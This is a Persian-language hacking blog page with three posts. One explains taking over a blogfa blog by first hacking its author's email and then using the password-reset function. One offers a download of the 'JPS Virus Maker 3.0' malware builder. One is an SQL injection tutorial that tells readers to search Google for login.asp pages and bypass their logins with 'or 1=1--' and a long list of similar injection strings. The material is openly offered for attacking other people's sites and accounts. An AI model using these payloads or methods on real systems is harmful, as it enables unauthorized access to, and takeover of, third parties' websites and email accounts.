•^v^–[_(¯`·._ با جی جی هکران را هک کنید _.·´¯)_]–^v^•

تبلیغات

•^v^–[_(¯`·._ با جی جی هکران را هک کنید _.·´¯)_]–^v^• - پست های هک کردن وب لاگ و سایت

هک کردن وبلاگ [هک کردن وب لاگ و سایت , ]

برای این کار باید اول ایمیل شخصی که در آن وبلاگ می نویسد را بدست آورد که برای این کار وارد آن وبلاگ شوید و به دنبال پست الکترونیک می گردیم که در سمت چپ یا راست وبلاگ قرار دارد و بعد آن باید آن ایمیل یا همان آیدی را هک کرد و پسورد آن را بدست آوریم ( با استفاده از آموزش هایی که داده شده است ) را هک کنیم bamzi123.blogfa.com حالا ما فرض می کنیم که می خواهیم می شویم و در زیر قسمتی که باید کلمه عبور و شناسه کاربری را وارد کرد blogfa ابتدا وارد سایتیه گزینه دارد که نوشته شده : کلمه عبور خود را فراموش کرده ام و آن را می زنیم و از ما شناسه کاربری و ایمیل می خواهد که شناسه همیشه همان اسم وبلاگ می باشد و ایمیل هم همان ایمیلی که در وبلاگ گفته شده است را وارد می کنیم و پسورد دوباره به آن ایمیل فرستاده می شود و ما که آن ایمیل را از قبل هک کرده ایم و پسورد آن را داریم و وارد ایمیل شده و پسورد وبلاگ که فرستاده شده را بر می داریم .

نوشته شده توسط جی جی در چهارشنبه 3 مرداد 1386 و ساعت 01:07 ق.ظ
ویرایش شده در - و ساعت -

لینک ثابت || نطرات [--]

..:: JPS (Virus Maker 3.0) ::.. [هک کردن وب لاگ و سایت , ]

Download

نوشته شده توسط جی جی در سه شنبه 2 مرداد 1386 و ساعت 02:07 ق.ظ
ویرایش شده در - و ساعت -

ادامه مطلب

لینک ثابت || نطرات [--]

هک سایت و وبلاگ [هک کردن وب لاگ و سایت , ]

یكی از نقطه ضعف های Sql رشته ی ساختار ان میباشد كه همیشه آسیب پذیر بوده و مورد حمله قرار میگیرد این آموزش به شما روشهایی یاد میده كه بتوانید این ساختار را مورد حمله قرار بدهید .
حالا میتوانید در گوگل عبارت زیر را سرچ كنید :
login.asp
در جواب برای شما تقریبا 17 هزار مورد پیدا میكند . حالا به لینك یافته ها دقت كنید مثلا چنین خواهید یافت :
www.site.com/login.asp
یا چیزهایی مشابه این . این قسمتها را میتوانیم مورد حمله قرار دهیم . حالا به ساده ترین قسمت رسیدیم
كافی است برای رد كردن این مانع بصورت زیر عمل كنید
بجای یوزر نیم Admin را بزنید و بجای پسورد از این عبارت استفاده كنید
or 1=1—
شاید تا حالا كه مقاله را خوانده اید تعجب كرده اید كه این امر چگونه امكان پذیر است . در تمامی این عملیات اطلاعات لاگین شما بصورت Query فرستاده میشود . اگر اطلاعات درست باشد شما اجازه ی ورود خواهید یافت وگرنه با پیغام Login Failed مواجه خواهید شد . وقتی شما ارسالی را با یوزر ادمین و با پسورد 1234 را ارسال میكنید از حالت اول به حالت دوم تغییر پیدا میكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از این تركیبات شما میتوانید با توجه به ساختار اس كیو ال برای آن پسورد هایی ارسال كنید كه در صورت قرار گرفتن در این پسورد مورد قبول قرار گیرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . این تركیبات كه با توجه به ساختار اس كیو ال نوشته شده به این صورت میباشد نمونه هایی از آن مشاهده میكنید :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

" or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi" or ("a"="a

همانطور كه مشاهده كردید این روش یك روش ساده اما ابتكاری مباشذ كه احتیاج به تفكر دقیق دارد البته ساختار ها متفاوت میباشند و شما میتوانید همه ی این تركیبات بالا را به عنوان پسورد امتحان كنید و حتما به جواب خواهید رسید .

نوشته شده توسط جی جی در پنجشنبه 3 فروردین 1385 و ساعت 05:03 ق.ظ
ویرایش شده در - و ساعت -